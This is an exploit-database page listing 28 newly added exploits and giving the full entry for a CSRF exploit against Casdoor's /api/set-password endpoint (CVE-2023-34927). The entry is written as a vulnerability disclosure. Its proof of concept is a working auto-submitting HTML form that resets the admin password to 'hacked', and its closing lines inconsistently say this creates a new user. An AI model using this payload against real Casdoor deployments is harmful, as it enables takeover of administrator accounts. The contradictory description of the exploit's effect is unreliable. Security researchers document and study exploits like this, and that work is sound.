a44e138f78
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
|
|
# Application: Casdoor
|
|
# Version: <= 1.331.0
|
|
# Date: 03/07/2024
|
|
# Exploit Author: Van Lam Nguyen
|
|
# Vendor Homepage: https://casdoor.org/
|
|
# Software Link: https://github.com/casdoor/casdoor
|
|
# Tested on: Windows
|
|
# CVE : CVE-2023-34927
|
|
|
|
Overview
|
|
==================================================
|
|
Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
|
|
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
|
|
|
|
Proof of Concept
|
|
==================================================
|
|
|
|
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
|
|
|
|
<html>
|
|
<form action="http://localhost:8000/api/set-password" method="POST">
|
|
<input name='userOwner' value='built-in' type='hidden'>
|
|
<input name='userName' value='admin' type='hidden'>
|
|
<input name='newPassword' value='hacked' type='hidden'>
|
|
<input type=submit>
|
|
</form>
|
|
<script>
|
|
history.pushState('', '', '/');
|
|
document.forms[0].submit();
|
|
</script>
|
|
|
|
</html>
|
|
|
|
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
|
|
|
|
userOwner: built-in
|
|
userName: admin
|
|
newPassword: hacked |